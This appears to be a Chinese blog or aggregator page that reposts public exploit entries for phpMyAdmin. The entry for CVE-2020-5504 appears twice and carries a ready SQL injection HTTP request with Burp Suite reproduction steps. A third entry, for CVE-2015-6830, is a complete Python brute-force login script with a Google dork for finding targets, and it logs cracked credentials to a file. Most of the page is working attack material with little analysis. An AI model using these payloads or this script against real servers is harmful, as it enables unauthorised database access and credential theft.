PhpMyAdmin on 办公AI智能小助手

phpMyAdmin 5.0.0 SQL注入漏洞分析与利用

Mon, 12 Jan 2026 02:32:44 +0800

Exploit标题：phpMyAdmin 5.0.0 - SQL注入

日期：2025-11-25

漏洞作者：CodeSecLab

供应商主页：https://github.com/phpmyadmin/phpmyadmin/

软件链接：https://github.com/phpmyadmin/phpmyadmin/

版本：5.0.0

测试环境：Windows

CVE：CVE-2020-5504

漏洞验证代码

1
2
3

GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

附加条件：

攻击者必须拥有有效的MySQL账户才能访问服务器。

复现步骤

登录phpmyadmin。
使用Burp Suite等Web代理工具拦截并发送恶意请求，确保请求中包含有效的会话cookie。
观察结果。

phpMyAdmin 5.0.0 SQL注入漏洞技术分析与利用

Wed, 10 Dec 2025 08:45:06 +0800

漏洞标题：phpMyAdmin 5.0.0 - SQL注入

日期：2025-11-25

漏洞作者：CodeSecLab

供应商主页：https://github.com/phpmyadmin/phpmyadmin/

软件链接：https://github.com/phpmyadmin/phpmyadmin/

版本：5.0.0

测试平台：Windows

CVE：CVE-2020-5504

概念验证 (Proof Of Concept)

1
2
3

GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

附加条件：

攻击者必须拥有一个有效的MySQL账户才能访问服务器。

漏洞复现步骤

登录phpMyAdmin。
使用Burp Suite等网络代理工具拦截并发送恶意请求，确保请求中包含有效的会话Cookie。
观察结果。

PHPMyAdmin 3.0暴力破解登录绕过漏洞分析

Tue, 04 Nov 2025 13:16:18 +0800

"""
Exploit-Title: PHPMyAdmin 3.0 - Bruteforce Login Bypass
Author: Nikola Markovic (badgerinc23@gmail.com)
Date: 2023
Google-Dork: intext: phpMyAdmin
Vendor: https://www.phpmyadmin.net/
Version: >3.0 & 4.3.x before 4.3.13.2 and 4.4.x before 4.4.14.1
Tested on: win/linux/unix
Python-Version: 3.0
CVE : CVE-2015-6830
"""
import urllib.request
import urllib.parse
import urllib
import threading
import http.cookiejar
import re
import sys

def CheckLogin(target):
    passwords = ["123"]
    try:
        for password in passwords:
            print("Try Host: "+target+" with Combo: root/"+password+"!\n")
            load_token = urllib.request.Request(target)
            fetch_token = urllib.request.urlopen(load_token,timeout=2).read()
            token = re.findall(r'name="token" value="([\w\.-]+)"',fetch_token.decode('utf-8')) # token fetching
            session = re.findall(r'name="set_session" value="([\w\.-]+)"',fetch_token.decode('utf-8')) ## session token fetching
            login_data = urllib.parse.urlencode({ 'pma_username': "root", 'pma_password': password,'set_session': session[0], 'token':token}) ## injecting payload to bruteforce
            login = login_data.encode()
            cookies = http.cookiejar.CookieJar()
            opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookies))
            do_it = opener.open(target,login,timeout=2)
            check = do_it.read()
            if b"index.php?route=/logout" in check:
                f = open('bruted_pma','a')
                f.write(target+" Bruted: root/"+password+"\n")
                f.close()
    except:
        pass

if sys.argv[1]:
    t = threading.Thread(target=CheckLogin,args=(str(sys.argv[1]),))
    if threading.active_count() < 500:
        t.start()
    else:
        t.start()
        t.join()

漏洞概述

该漏洞利用PHPMyAdmin 3.0及以上版本（包括4.3.x在4.3.13.2之前和4.4.x在4.4.14.1之前版本）中的认证机制缺陷，通过暴力破解方式绕过登录验证。